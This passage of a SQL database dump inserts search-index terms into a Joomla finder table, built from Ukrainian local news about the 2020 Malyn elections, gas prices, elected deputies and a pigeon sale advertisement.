безліч',0,1,1.8,'щ000',1,'*'),(1617716,'щось','щось',0,0,0.2667,'щ000',1,'*'),(1617717,'щось селу','щось селу',0,1,1.3,'щ000',1,'*'),(1617718,'щось селу на','щось селу на',0,1,1.4,'щ000',1,'*'),(1617719,'я','я',0,0,0.0667,'я000',1,'*'),(1617720,'я з','я з',0,1,1.1,'я000',1,'*'),(1617721,'я з села','я з села',0,1,1.2667,'я000',1,'*'),(1617722,'я мала','я мала',0,1,1.2,'я000',1,'*'),(1617723,'я мала справу','я мала справу',0,1,1.4333,'я000',1,'*'),(1617724,'я як','я як',0,1,1.1333,'я000',1,'*'),(1617725,'я як людина','я як людина',0,1,1.3667,'я000',1,'*'),(1617726,'як кандидат','як кандидат',0,1,1.3667,'я000',1,'*'),(1617727,'як кандидат реалізував','як кандидат реалізував',0,1,1.7333,'я000',1,'*'),(1617728,'як людина','як людина',0,1,1.3,'я000',1,'*'),(1617729,'як людина котра','як людина котра',0,1,1.5,'я000',1,'*'),(1617730,'як фінансуватимуться','як фінансуватимуться',0,1,1.6667,'я000',1,'*'),(1617731,'як фінансуватимуться сільські','як фінансуватимуться сільські',0,1,1.9667,'я000',1,'*'),(1617732,'які бачите','які бачите',0,1,1.3333,'я000',1,'*'),(1617733,'які бачите перспективи','які бачите перспективи',0,1,1.7333,'я000',1,'*'),(1617734,'які витрачались','які витрачались',0,1,1.5,'я000',1,'*'),(1617735,'які витрачались приміром','які витрачались приміром',0,1,1.8,'я000',1,'*'),(1617736,'які його','які його',0,1,1.2667,'я000',1,'*'),(1617737,'які його конкретні','які його конкретні',0,1,1.6,'я000',1,'*'),(1617738,'які не','які не',0,1,1.2,'я000',1,'*'),(1617739,'які не сформовані','які не сформовані',0,1,1.5667,'я000',1,'*'),(1617740,'які формувалися','які формувалися',0,1,1.5,'я000',1,'*');
INSERT INTO `fw3gt_finder_terms` VALUES (1617741,'які формувалися роками','які формувалися роками',0,1,1.7333,'я000',1,'*'),(1617742,'якій байдуже','якій байдуже',0,1,1.4,'я000',1,'*'),(1617743,'якій байдуже доля','якій байдуже доля',0,1,1.5667,'я000',1,'*'),(1617744,'якій він','якій він',0,1,1.2667,'я000',1,'*'),(1617745,'якій він знаходиться','якій він знаходиться',0,1,1.6667,'я000',1,'*'),(1617746,'якість','якість',0,0,0.4,'я000',1,'*'),(1617747,'якість нашого','якість нашого',0,1,1.4333,'я000',1,'*'),(1617748,'якість нашого з','якість нашого з',0,1,1.5,'я000',1,'*'),(1617749,'який називається','який називається',0,1,1.5333,'я000',1,'*'),(1617750,'який називається «міський','який називається «міський',0,1,1.8333,'я000',1,'*'),(1617751,'якоїсь','якоїсь',0,0,0.4,'я000',1,'*'),(1617752,'якоїсь проблеми','якоїсь проблеми',0,1,1.5,'я000',1,'*'),(1617753,'якоїсь проблеми можна','якоїсь проблеми можна',0,1,1.7,'я000',1,'*'),(1617754,'якому','якому',0,0,0.3333,'я000',2,'*'),(1617755,'якому село','якому село',0,1,1.3333,'я000',1,'*'),(1617756,'якому село матиме','якому село матиме',0,1,1.5667,'я000',1,'*'),(1617757,'яку громадянську','яку громадянську',0,1,1.5333,'я000',1,'*'),(1617758,'яку громадянську позицію','яку громадянську позицію',0,1,1.8,'я000',1,'*'),(1617759,'якщо','якщо',0,0,0.2667,'я000',3,'*'),(1617760,'якщо вони','якщо вони',0,1,1.3,'я000',1,'*'),(1617761,'якщо вони пройдуть','якщо вони пройдуть',0,1,1.6,'я000',1,'*'),(1617762,'якщо зробити','якщо зробити',0,1,1.4,'я000',1,'*'),(1617763,'якщо зробити такий','якщо зробити такий',0,1,1.6,'я000',1,'*'),(1617764,'якщо староста','якщо староста',0,1,1.4333,'я000',1,'*'),(1617765,'якщо староста комусь','якщо староста комусь',0,1,1.6667,'я000',1,'*'),(1617884,'10 2020','10 2020',0,1,1.2333,'',1,'*'),(1617885,'10 2020 roku','10 2020 roku',0,1,1.4,'R200',1,'*'),(1617886,'11164','11164',0,0,0.5,'',1,'*'),(1617887,'11164 yaki','11164 yaki',0,1,1.3333,'Y200',1,'*'),(1617888,'11164 yaki vzyali','11164 yaki vzyali',0,1,1.5667,'Y2124',1,'*'),(1617889,'11164 які','11164 які',0,1,1.3,'я000',1,'*'),(1617890,'11164 які взяли','11164 які взяли',0,1,1.5,'я000',1,'*'),(1617891,'2020 roku viddali','2020 roku viddali',0,1,1.5667,'R2134',1,'*'),(1617892,'2484','2484',0,0,0.4,'',1,'*'),(1617893,'25 10','25 10',0,1,1.1667,'',1,'*'),(1617894,'25 10 2020','25 10 2020',0,1,1.3333,'',1,'*'),(1617895,'25.10.2020','25.10.2020',0,0,1,'',1,'*'),(1617896,'25.10.2020 року','25.10.2020 року',0,1,1.5,'р000',1,'*'),(1617897,'25.10.2020 року віддали','25.10.2020 року віддали',0,1,1.7667,'р000',1,'*'),(1617898,'5293','5293',0,0,0.4,'',1,'*'),(1617899,'5293 vibortsi','5293 vibortsi',0,1,1.4333,'V632',1,'*'),(1617900,'5293 vibortsi iz','5293 vibortsi iz',0,1,1.5333,'V632',1,'*'),(1617901,'5293 виборці','5293 виборці',0,1,1.4,'в000',1,'*'),(1617902,'5293 виборці із','5293 виборці із',0,1,1.5,'в000',1,'*'),(1617903,'golos','golos',0,0,0.3333,'G420',2,'*'),(1617904,'golos za','golos za',0,1,1.2667,'G420',1,'*'),(1617905,'golos za sitajla','golos za sitajla',0,1,1.5333,'G42324',1,'*'),(1617906,'golosuvanni','golosuvanni',0,0,0.7333,'G4215',1,'*'),(1617907,'golosuvanni 25','golosuvanni 25',0,1,1.4667,'G4215',1,'*'),(1617908,'golosuvanni 25 10','golosuvanni 25 10',0,1,1.5667,'G4215',1,'*'),(1617909,'grigorovicha','grigorovicha',0,0,0.8,'G62612',1,'*'),(1617910,'iz','iz',0,0,0.1333,'I200',2,'*'),(1617911,'iz 11164','iz 11164',0,1,1.2667,'I200',1,'*'),(1617912,'iz 11164 yaki','iz 11164 yaki',0,1,1.4333,'I200',1,'*'),(1617913,'oleksandra','oleksandra',0,0,0.6667,'O42536',1,'*'),(1617914,'oleksandra grigorovicha','oleksandra grigorovicha',0,1,1.7667,'O42536262612',1,'*'),(1617915,'roku viddali','roku viddali',0,1,1.4,'R2134',1,'*'),(1617916,'roku viddali svij','roku viddali svij',0,1,1.5667,'R2134212',1,'*'),(1617917,'sitajla','sitajla',0,0,0.4667,'S324',1,'*'),(1617918,'sitajla oleksandra','sitajla oleksandra',0,1,1.6,'S3242536',1,'*'),(1617919,'sitajla oleksandra grigorovicha','sitajla oleksandra grigorovicha',0,1,2,'S3242536262612',1,'*'),(1617920,'svij','svij',0,0,0.2667,'S120',1,'*'),(1617921,'svij golos','svij golos',0,1,1.3333,'S1242',1,'*'),(1617922,'svij golos za','svij golos za',0,1,1.4333,'S1242',1,'*'),(1617923,'u golosuvanni','u golosuvanni',0,1,1.4333,'U24215',1,'*'),(1617924,'u golosuvanni 25','u golosuvanni 25',0,1,1.5333,'U24215',1,'*'),(1617925,'uchast','uchast',0,0,0.4,'U230',1,'*'),(1617926,'uchast u','uchast u',0,1,1.2667,'U230',1,'*'),(1617927,'uchast u golosuvanni','uchast u golosuvanni',0,1,1.6667,'U2324215',1,'*'),(1617928,'vibortsi','vibortsi',0,0,0.5333,'V632',1,'*'),(1617929,'vibortsi iz','vibortsi iz',0,1,1.3667,'V632',1,'*'),(1617930,'vibortsi iz 11164','vibortsi iz 11164',0,1,1.5667,'V632',1,'*'),(1617931,'viddali','viddali',0,0,0.4667,'V340',1,'*'),(1617932,'viddali svij','viddali svij',0,1,1.4,'V34212',1,'*'),(1617933,'viddali svij golos','viddali svij golos',0,1,1.6,'V3421242',1,'*'),(1617934,'vzyali','vzyali',0,0,0.4,'V240',1,'*'),(1617935,'vzyali uchast','vzyali uchast',0,1,1.4333,'V2423',1,'*'),(1617936,'vzyali uchast u','vzyali uchast u',0,1,1.5,'V2423',1,'*'),(1617937,'yaki vzyali','yaki vzyali',0,1,1.3667,'Y2124',1,'*'),(1617938,'yaki vzyali uchast','yaki vzyali uchast',0,1,1.6,'Y212423',1,'*'),(1617939,'za sitajla','za sitajla',0,1,1.3333,'Z324',1,'*'),(1617940,'za sitajla oleksandra','za sitajla oleksandra',0,1,1.7,'Z3242536',1,'*'),(1617941,'із 11164','із 11164',0,1,1.2667,'і000',1,'*'),(1617942,'із 11164 які','із 11164 які',0,1,1.4,'і000',1,'*'),(1617943,'віддали','віддали',0,0,0.4667,'в000',1,'*'),(1617944,'віддали свій','віддали свій',0,1,1.4,'в000',1,'*'),(1617945,'віддали свій голос','віддали свій голос',0,1,1.6,'в000',1,'*'),(1617946,'взяли участь','взяли участь',0,1,1.4,'в000',1,'*'),(1617947,'взяли участь у','взяли участь у',0,1,1.4667,'в000',1,'*'),(1617948,'виборці','виборці',0,0,0.4667,'в000',1,'*'),(1617949,'виборці із','виборці із',0,1,1.3333,'в000',1,'*'),(1617950,'виборці із 11164','виборці із 11164',0,1,1.5333,'в000',1,'*'),(1617951,'голос','голос',0,0,0.3333,'г000',4,'*'),(1617952,'голос за','голос за',0,1,1.2667,'г000',1,'*'),(1617953,'голос за ситайла','голос за ситайла',0,1,1.5333,'г000',1,'*'),(1617954,'голосуванні','голосуванні',0,0,0.7333,'г000',1,'*'),(1617955,'голосуванні 25.10.2020','голосуванні 25.10.2020',0,1,1.7333,'г000',1,'*'),(1617956,'голосуванні 25.10.2020 року','голосуванні 25.10.2020 року',0,1,1.9,'г000',1,'*'),(1617957,'григоровича','григоровича',0,0,0.7333,'г000',1,'*'),(1617958,'за ситайла','за ситайла',0,1,1.3333,'з000',1,'*'),(1617959,'за ситайла олександра','за ситайла олександра',0,1,1.7,'з000',1,'*'),(1617960,'олександра григоровича','олександра григоровича',0,1,1.7333,'о000',1,'*'),(1617961,'року віддали','року віддали',0,1,1.4,'р000',1,'*'),(1617962,'року віддали свій','року віддали свій',0,1,1.5667,'р000',1,'*'),(1617963,'свій','свій',0,0,0.2667,'с000',1,'*'),(1617964,'свій голос','свій голос',0,1,1.3333,'с000',1,'*'),(1617965,'свій голос за','свій голос за',0,1,1.4333,'с000',1,'*'),(1617966,'ситайла','ситайла',0,0,0.4667,'с000',1,'*'),(1617967,'ситайла олександра','ситайла олександра',0,1,1.6,'с000',1,'*'),(1617968,'ситайла олександра григоровича','ситайла олександра григоровича',0,1,2,'с000',1,'*'),(1617969,'у голосуванні','у голосуванні',0,1,1.4333,'у000',1,'*'),(1617970,'у голосуванні 25.10.2020','у голосуванні 25.10.2020',0,1,1.8,'у000',1,'*'),(1617971,'участь у','участь у',0,1,1.2667,'у000',2,'*'),(1617972,'участь у голосуванні','участь у голосуванні',0,1,1.6667,'у000',1,'*'),(1617973,'які взяли','які взяли',0,1,1.3,'я000',1,'*'),(1617974,'які взяли участь','які взяли участь',0,1,1.5333,'я000',1,'*'),(1618011,'2020 roku v','2020 roku v',0,1,1.3667,'R210',1,'*'),(1618012,'2020 року в','2020 року в',0,1,1.3667,'р000',1,'*'),(1618013,'2485','2485',0,0,0.4,'',1,'*'),(1618014,'com ua','com ua',0,1,1.2,'C500',6,'*'),(1618015,'gazpravda','gazpravda',0,0,0.6,'G1613',6,'*'),(1618016,'gazpravda com','gazpravda com',0,1,1.4333,'G161325',6,'*'),(1618017,'gazpravda com ua','gazpravda com ua',0,1,1.5333,'G161325',6,'*'),(1618018,'gazu','gazu',0,0,0.2667,'G000',3,'*'),(1618019,'gazu v','gazu v',0,1,1.2,'G100',1,'*'),(1618020,'gazu v listopadi','gazu v listopadi',0,1,1.5333,'G142313',1,'*'),(1618021,'https gazpravda','https gazpravda',0,1,1.5,'H3121613',6,'*'),(1618022,'https gazpravda com','https gazpravda com',0,1,1.6333,'H312161325',6,'*'),(1618023,'listopadi','listopadi',0,0,0.6,'L2313',1,'*'),(1618024,'listopadi 2020','listopadi 2020',0,1,1.4667,'L2313',1,'*'),(1618025,'listopadi 2020 roku','listopadi 2020 roku',0,1,1.6333,'L231362',1,'*'),(1618026,'postachalnikiv','postachalnikiv',0,0,0.9333,'P2324521',1,'*'),(1618027,'prirodnogo','prirodnogo',0,0,0.6667,'P6352',1,'*'),(1618028,'prirodnogo gazu','prirodnogo gazu',0,1,1.5,'P6352',1,'*'),(1618029,'prirodnogo gazu v','prirodnogo gazu v',0,1,1.5667,'P63521',1,'*'),(1618030,'roku v','roku v',0,1,1.2,'R210',1,'*'),(1618031,'roku v rozrizi','roku v rozrizi',0,1,1.4667,'R216262',1,'*'),(1618032,'rozrizi','rozrizi',0,0,0.4667,'R262',1,'*'),(1618033,'rozrizi postachalnikiv','rozrizi postachalnikiv',0,1,1.7333,'R26212324521',1,'*'),(1618034,'v listopadi','v listopadi',0,1,1.3667,'V42313',1,'*'),(1618035,'v listopadi 2020','v listopadi 2020',0,1,1.5333,'V42313',1,'*'),(1618036,'v rozrizi','v rozrizi',0,1,1.3,'V6262',1,'*'),(1618037,'v rozrizi postachalnikiv','v rozrizi postachalnikiv',0,1,1.8,'V626212324521',1,'*'),(1618038,'vartist','vartist',0,0,0.4667,'V6323',2,'*'),(1618039,'vartist prirodnogo','vartist prirodnogo',0,1,1.6,'V632316352',1,'*'),(1618040,'vartist prirodnogo gazu','vartist prirodnogo gazu',0,1,1.7667,'V632316352',1,'*'),(1618041,'в листопаді','в листопаді',0,1,1.3667,'в000',1,'*'),(1618042,'в листопаді 2020','в листопаді 2020',0,1,1.5333,'в000',1,'*'),(1618043,'в розрізі','в розрізі',0,1,1.3,'в000',1,'*'),(1618044,'в розрізі постачальників','в розрізі постачальників',0,1,1.8,'в000',1,'*'),(1618045,'вартість','вартість',0,0,0.5333,'в000',3,'*'),(1618046,'вартість природного','вартість природного',0,1,1.6333,'в000',1,'*'),(1618047,'вартість природного газу','вартість природного газу',0,1,1.8,'в000',1,'*'),(1618048,'газу','газу',0,0,0.2667,'г000',6,'*'),(1618049,'газу в','газу в',0,1,1.2,'г000',2,'*'),(1618050,'газу в листопаді','газу в листопаді',0,1,1.5333,'г000',1,'*'),(1618051,'за матеріалами','за матеріалами',0,1,1.4667,'з000',2,'*'),(1618052,'за матеріалами https','за матеріалами https',0,1,1.6667,'з312',2,'*'),(1618053,'листопаді','листопаді',0,0,0.6,'л000',1,'*'),(1618054,'листопаді 2020','листопаді 2020',0,1,1.4667,'л000',1,'*'),(1618055,'листопаді 2020 року','листопаді 2020 року',0,1,1.6333,'л000',1,'*'),(1618056,'матеріалами','матеріалами',0,0,0.7333,'м000',2,'*'),(1618057,'матеріалами https','матеріалами https',0,1,1.5667,'м312',2,'*'),(1618058,'матеріалами https gazpravda','матеріалами https gazpravda',0,1,1.9,'м3121613',2,'*'),(1618059,'постачальників','постачальників',0,0,0.9333,'п000',1,'*'),(1618060,'природного','природного',0,0,0.6667,'п000',2,'*'),(1618061,'природного газу','природного газу',0,1,1.5,'п000',2,'*'),(1618062,'природного газу в','природного газу в',0,1,1.5667,'п000',1,'*'),(1618063,'розрізі','розрізі',0,0,0.4667,'р000',1,'*'),(1618064,'розрізі постачальників','розрізі постачальників',0,1,1.7333,'р000',1,'*'),(1618065,'року в','року в',0,1,1.2,'р000',1,'*'),(1618066,'року в розрізі','року в розрізі',0,1,1.4667,'р000',1,'*'),(1620165,'16','16',0,0,0.2,'',3,'*'),(1620171,'19.06.1960','19.06.1960',0,0,1,'',2,'*'),(1620172,'19.06.1960 р','19.06.1960 р',0,1,1.4,'р000',2,'*'),(1620173,'19.06.1960 р освіта','19.06.1960 р освіта',0,1,1.6333,'р000',2,'*'),(1620259,'європейська','європейська',0,0,0.7333,'є000',2,'*'),(1620260,'європейська солідарність','європейська солідарність',0,1,1.8,'є000',2,'*'),(1620267,'іванівна','іванівна',0,0,0.5333,'і000',2,'*'),(1620273,'іванович','іванович',0,0,0.5333,'і000',2,'*'),(1620278,'ім\'я','ім',0,0,0.2667,'і000',2,'*'),(1620279,'ім\'я по','ім по',0,1,1.2333,'і000',2,'*'),(1620280,'ім\'я по батькові','ім по батькові',0,1,1.5333,'і000',2,'*'),(1620292,'апк','апк',0,0,0.2,'а000',2,'*'),(1620305,'батьківщина','батьківщина',0,0,0.7333,'б000',2,'*'),(1620310,'батькові','батькові',0,0,0.5333,'б000',2,'*'),(1620313,'безпартійна','безпартійна',0,0,0.7333,'б000',2,'*'),(1620331,'безпартійний','безпартійний',0,0,0.8,'б000',2,'*'),(1620342,'безпартійний пенсіонер','безпартійний пенсіонер',0,1,1.7333,'б000',2,'*'),(1620343,'безпартійний пенсіонер місце','безпартійний пенсіонер місце',0,1,1.9333,'б000',2,'*'),(1620344,'безпартійний тов','безпартійний тов',0,1,1.5333,'б000',2,'*'),(1620353,'в\'ячеслав','в',0,0,0.6,'в000',2,'*'),(1620356,'відділу','відділу',0,0,0.4667,'в000',2,'*'),(1620361,'відомості про обраного','відомості про обраного',0,1,1.7333,'в000',2,'*'),(1620384,'висунула','висунула',0,0,0.5333,'в000',2,'*'),(1620390,'вища','вища',0,0,0.2667,'в000',2,'*'),(1620391,'вища безпартійна','вища безпартійна',0,1,1.5333,'в000',2,'*'),(1620396,'вища безпартійний','вища безпартійний',0,1,1.5667,'в000',2,'*'),(1620402,'вища безпартійний пенсіонер','вища безпартійний пенсіонер',0,1,1.9,'в000',2,'*'),(1620418,'всеукраїнське','всеукраїнське',0,0,0.8667,'в000',2,'*'),(1620419,'всеукраїнське об\'єднання','всеукраїнське об',0,1,1.8,'в000',2,'*'),(1620420,'всеукраїнське об\'єднання батьківщина','всеукраїнське об батьківщина',0,1,2,'в000',2,'*'),(1620424,'галина','галина',0,0,0.4,'г000',2,'*'),(1620427,'голова місце','голова місце',0,1,1.4,'г000',2,'*'),(1620428,'голова місце проживання','голова місце проживання',0,1,1.7667,'г000',2,'*'),(1620438,'головний','головний',0,0,0.5333,'г000',2,'*'),(1620441,'господарство','господарство',0,0,0.8,'г000',2,'*'),(1620444,'грищенко','грищенко',0,0,0.5333,'г000',2,'*'),(1620447,'громадянин','громадянин',0,0,0.6667,'г000',2,'*'),(1620448,'громадянин україни','громадянин україни',0,1,1.6,'г000',2,'*'),(1620449,'громадянин україни народився','громадянин україни народився',0,1,1.9333,'г000',2,'*'),(1620450,'громадянка','громадянка',0,0,0.6667,'г000',2,'*'),(1620451,'громадянка україни','громадянка україни',0,1,1.6,'г000',2,'*'),(1620452,'громадянка україни народилася','громадянка україни народилася',0,1,1.9667,'г000',2,'*'),(1620458,'депутата','депутата',0,0,0.5333,'д000',2,'*'),(1620465,'директор','директор',0,0,0.5333,'д000',2,'*'),(1620466,'директор місце','директор місце',0,1,1.4667,'д000',2,'*'),(1620467,'директор місце проживання','директор місце проживання',0,1,1.8333,'д000',2,'*'),(1620474,'дп','дп',0,0,0.1333,'д000',2,'*'),(1620486,'житомирська обл','житомирська обл',0,1,1.5,'ж000',2,'*'),(1620500,'завідуюча','завідуюча',0,0,0.6,'з000',2,'*'),(1620501,'завідуюча місце','завідуюча місце',0,1,1.5,'з000',2,'*'),(1620502,'завідуюча місце проживання','завідуюча місце проживання',0,1,1.8667,'з000',2,'*'),(1620503,'загальна','загальна',0,0,0.5333,'з000',2,'*'),(1620504,'загальна середня','загальна середня',0,1,1.5333,'з000',2,'*'),(1620505,'загальна середня безпартійна','загальна середня безпартійна',0,1,1.9333,'з000',2,'*'),(1620523,'кількість обраних','кількість обраних',0,1,1.5667,'к000',2,'*'),(1620524,'кількість обраних депутатів','кількість обраних депутатів',0,1,1.9,'к000',2,'*'),(1620542,'край','край',0,0,0.2667,'к000',2,'*'),(1620543,'край 16','край 16',0,1,1.2333,'к000',2,'*'),(1620564,'людмила','людмила',0,0,0.4667,'л000',2,'*'),(1620569,'м малин','м малин',0,1,1.2333,'м000',6,'*'),(1620572,'місце проживання','місце проживання',0,1,1.5333,'м000',2,'*'),(1620573,'місце проживання м','місце проживання м',0,1,1.6,'м000',2,'*'),(1620574,'місце проживання с','місце проживання с',0,1,1.6,'м000',2,'*'),(1620576,'місцева організація','місцева організація',0,1,1.6333,'м000',2,'*'),(1620577,'місцева організація якої','місцева організація якої',0,1,1.8,'м000',2,'*'),(1620581,'майстренко','майстренко',0,0,0.6667,'м000',2,'*'),(1620592,'малинський р-н','малинський р-н',0,1,1.4667,'м000',2,'*'),(1620593,'малинський р-н житомирська','малинський р-н житомирська',0,1,1.8667,'м000',2,'*'),(1620603,'миколайович','миколайович',0,0,0.7333,'м000',2,'*'),(1620617,'назва політичної','назва політичної',0,1,1.5333,'н000',2,'*'),(1620618,'назва політичної партії','назва політичної партії',0,1,1.7667,'н000',2,'*'),(1620619,'народився','народився',0,0,0.6,'н000',2,'*'),(1620634,'народився 19.06.1960','народився 19.06.1960',0,1,1.6667,'н000',2,'*'),(1620635,'народився 19.06.1960 р','народився 19.06.1960 р',0,1,1.7333,'н000',2,'*'),(1620642,'народилася','народилася',0,0,0.6667,'н000',2,'*'),(1620667,'народу','народу',0,0,0.4,'н000',2,'*'),(1620674,'начальник','начальник',0,0,0.6,'н000',2,'*'),(1620677,'наш','наш',0,0,0.2,'н000',2,'*'),(1620678,'наш край','наш край',0,1,1.2667,'н000',2,'*'),(1620679,'наш край 16','наш край 16',0,1,1.3667,'н000',2,'*'),(1620692,'об\'єднання','об',0,0,0.6667,'о000',2,'*'),(1620693,'об\'єднання батьківщина','об батьківщина',0,1,1.7333,'о000',2,'*'),(1620696,'обл','обл',0,0,0.2,'о000',2,'*'),(1620725,'обраних','обраних',0,0,0.4667,'о000',2,'*'),(1620726,'обраних депутатів','обраних депутатів',0,1,1.5667,'о000',2,'*'),(1620728,'обраного','обраного',0,0,0.5333,'о000',3,'*'),(1620729,'обраного депутата','обраного депутата',0,1,1.5667,'о000',2,'*'),(1620734,'оксана','оксана',0,0,0.4,'о000',2,'*'),(1620745,'організація','організація',0,0,0.7333,'о000',2,'*'),(1620746,'організація якої','організація якої',0,1,1.5333,'о000',2,'*'),(1620747,'організація якої висунула','організація якої висунула',0,1,1.8333,'о000',2,'*'),(1620748,'освіта','освіта',0,0,0.4,'о000',2,'*'),(1620749,'освіта вища','освіта вища',0,1,1.3667,'о000',2,'*'),(1620750,'освіта вища безпартійна','освіта вища безпартійна',0,1,1.7667,'о000',2,'*'),(1620751,'освіта вища безпартійний','освіта вища безпартійний',0,1,1.8,'о000',2,'*'),(1620752,'освіта загальна','освіта загальна',0,1,1.5,'о000',2,'*'),(1620753,'освіта загальна середня','освіта загальна середня',0,1,1.7667,'о000',2,'*'),(1620754,'освіта середня','освіта середня',0,1,1.4667,'о000',2,'*'),(1620755,'освіта середня спеціальна','освіта середня спеціальна',0,1,1.8333,'о000',2,'*'),(1620762,'партії місцева','партії місцева',0,1,1.4667,'п000',2,'*'),(1620763,'партії місцева організація','партії місцева організація',0,1,1.8667,'п000',2,'*'),(1620764,'партія','партія',0,0,0.4,'п000',2,'*'),(1620765,'партія європейська','партія європейська',0,1,1.6,'п000',2,'*'),(1620766,'партія європейська солідарність','партія європейська солідарність',0,1,2,'п000',2,'*'),(1620767,'партія всеукраїнське','партія всеукраїнське',0,1,1.6667,'п000',2,'*'),(1620768,'партія всеукраїнське об\'єднання','партія всеукраїнське об',0,1,2,'п000',2,'*'),(1620769,'партія наш','партія наш',0,1,1.3333,'п000',2,'*'),(1620770,'партія наш край','партія наш край',0,1,1.5,'п000',2,'*'),(1620771,'партія слуга','партія слуга',0,1,1.4,'п000',2,'*'),(1620772,'партія слуга народу','партія слуга народу',0,1,1.6333,'п000',2,'*'),(1620773,'пенсіонер','пенсіонер',0,0,0.6,'п000',2,'*'),(1620774,'пенсіонер місце','пенсіонер місце',0,1,1.5,'п000',2,'*'),(1620775,'пенсіонер місце проживання','пенсіонер місце проживання',0,1,1.8667,'п000',2,'*'),(1620787,'по батькові','по батькові',0,1,1.3667,'п000',2,'*'),(1620789,'полісся','полісся',0,0,0.4667,'п000',2,'*'),(1620792,'політична','політична',0,0,0.6,'п000',2,'*'),(1620793,'політична партія','політична партія',0,1,1.5333,'п000',2,'*'),(1620794,'політична партія європейська','політична партія європейська',0,1,1.9333,'п000',2,'*'),(1620795,'політична партія всеукраїнське','політична партія всеукраїнське',0,1,2,'п000',2,'*'),(1620796,'політична партія наш','політична партія наш',0,1,1.6667,'п000',2,'*'),(1620797,'політична партія слуга','політична партія слуга',0,1,1.7333,'п000',2,'*'),(1620798,'політичної','політичної',0,0,0.6667,'п000',2,'*'),(1620799,'політичної партії','політичної партії',0,1,1.5667,'п000',2,'*'),(1620800,'політичної партії місцева','політичної партії місцева',0,1,1.8333,'п000',2,'*'),(1620807,'прізвище','прізвище',0,0,0.5333,'п000',2,'*'),(1620808,'прізвище ім\'я','прізвище ім',0,1,1.4333,'п000',2,'*'),(1620809,'прізвище ім\'я по','прізвище ім по',0,1,1.5333,'п000',2,'*'),(1620816,'про обраного','про обраного',0,1,1.4,'п000',2,'*'),(1620817,'про обраного депутата','про обраного депутата',0,1,1.7,'п000',2,'*'),(1620818,'проживання','проживання',0,0,0.6667,'п000',2,'*'),(1620819,'проживання м','проживання м',0,1,1.4,'п000',2,'*'),(1620820,'проживання м малин','проживання м малин',0,1,1.6,'п000',2,'*'),(1620821,'проживання с','проживання с',0,1,1.4,'п000',2,'*'),(1620832,'р','р',0,0,0.0667,'р000',2,'*'),(1620833,'р освіта','р освіта',0,1,1.2667,'р000',2,'*'),(1620834,'р освіта вища','р освіта вища',0,1,1.4333,'р000',2,'*'),(1620835,'р освіта загальна','р освіта загальна',0,1,1.5667,'р000',2,'*'),(1620836,'р освіта середня','р освіта середня',0,1,1.5333,'р000',2,'*'),(1620837,'р-н','р-н',0,0,0.2,'р000',2,'*'),(1620838,'р-н житомирська','р-н житомирська',0,1,1.5,'р000',2,'*'),(1620839,'р-н житомирська обл','р-н житомирська обл',0,1,1.6333,'р000',2,'*'),(1620878,'сільська','сільська',0,0,0.5333,'с000',2,'*'),(1620879,'сільська рада','сільська рада',0,1,1.4333,'с000',2,'*'),(1620899,'сергій','сергій',0,0,0.4,'с000',3,'*'),(1620902,'середня','середня',0,0,0.4667,'с000',2,'*'),(1620903,'середня безпартійна','середня безпартійна',0,1,1.6333,'с000',2,'*'),(1620906,'середня спеціальна','середня спеціальна',0,1,1.6,'с000',2,'*'),(1620907,'середня спеціальна безпартійна','середня спеціальна безпартійна',0,1,2,'с000',2,'*'),(1620921,'слуга','слуга',0,0,0.3333,'с000',2,'*'),(1620922,'слуга народу','слуга народу',0,1,1.4,'с000',2,'*'),(1620926,'солідарність','солідарність',0,0,0.8,'с000',2,'*'),(1620931,'спеціаліст','спеціаліст',0,0,0.6667,'с000',2,'*'),(1620932,'спеціаліст відділу','спеціаліст відділу',0,1,1.6,'с000',2,'*'),(1620934,'спеціальна','спеціальна',0,0,0.6667,'с000',2,'*'),(1620935,'спеціальна безпартійна','спеціальна безпартійна',0,1,1.7333,'с000',2,'*'),(1620959,'тов','тов',0,0,0.2,'т000',2,'*'),(1620964,'україни народився','україни народився',0,1,1.5667,'у000',2,'*'),(1620972,'україни народився 19.06.1960','україни народився 19.06.1960',0,1,1.9333,'у000',2,'*'),(1620976,'україни народилася','україни народилася',0,1,1.6,'у000',2,'*'),(1621005,'фоп','фоп',0,0,0.2,'ф000',2,'*'),(1621036,'якої','якої',0,0,0.2667,'я000',2,'*'),(1621037,'якої висунула','якої висунула',0,1,1.4333,'я000',2,'*'),(1621206,'0508320922','0508320922',0,0,1,'',9,'*'),(1621207,'0508320922 домовимось','0508320922 домовимось',0,1,1.7,'д000',6,'*'),(1621208,'0508320922 домовимось фото','0508320922 домовимось фото',0,1,1.8667,'д000',1,'*'),(1621209,'20 штук','20 штук',0,1,1.2333,'ш000',1,'*'),(1621210,'20 штук молодих','20 штук молодих',0,1,1.5,'ш000',1,'*'),(1621211,'2466','2466',0,0,0.4,'',1,'*'),(1621212,'foto fotohalereia poshtovi-holuby','foto fotohalereia poshtovi-holuby',0,1,2,'F31346123141',1,'*'),(1621213,'foto fotohalereia poshtovi-holubyhttps','foto fotohalereia poshtovi-holubyhttps',0,1,2,'F31346123141312',1,'*'),(1621214,'fotohalereia poshtovi-holuby','fotohalereia poshtovi-holuby',0,1,1.9333,'F346123141',1,'*'),(1621215,'fotohalereia poshtovi-holubyhttps','fotohalereia poshtovi-holubyhttps',0,1,2,'F346123141312',1,'*'),(1621216,'fotohalereia poshtovi-holubyhttps malehus','fotohalereia poshtovi-holubyhttps malehus',0,1,2,'F346123141312542',1,'*'),(1621217,'golubi','golubi',0,0,0.4,'G410',3,'*'),(1621218,'molodi poshtovi golubi','molodi poshtovi golubi',0,1,1.7333,'M431231241',1,'*'),(1621219,'poshtovi golubi','poshtovi golubi',0,1,1.5,'P231241',3,'*'),(1621220,'poshtovi-holuby','poshtovi-holuby',0,0,1,'P23141',1,'*'),(1621221,'poshtovi-holubyhttps','poshtovi-holubyhttps',0,0,1,'P23141312',1,'*'),(1621222,'poshtovi-holubyhttps malehus','poshtovi-holubyhttps malehus',0,1,1.9333,'P23141312542',1,'*'),(1621223,'poshtovi-holubyhttps malehus in','poshtovi-holubyhttps malehus in',0,1,2,'P231413125425',1,'*'),(1621224,'бердичів вінницю хмільник','бердичів вінницю хмільник',0,1,1.8333,'б000',1,'*'),(1621225,'в наявності 20','в наявності 20',0,1,1.4667,'в000',1,'*'),(1621226,'вінницю хмільник','вінницю хмільник',0,1,1.5333,'в000',1,'*'),(1621227,'вінницю хмільник телефонуйте','вінницю хмільник телефонуйте',0,1,1.9333,'в000',1,'*'),(1621228,'голуби','голуби',0,0,0.4,'г000',4,'*'),(1621229,'молоді поштові голуби','молоді поштові голуби',0,1,1.7,'м000',1,'*'),(1621230,'молодих поштових','молодих 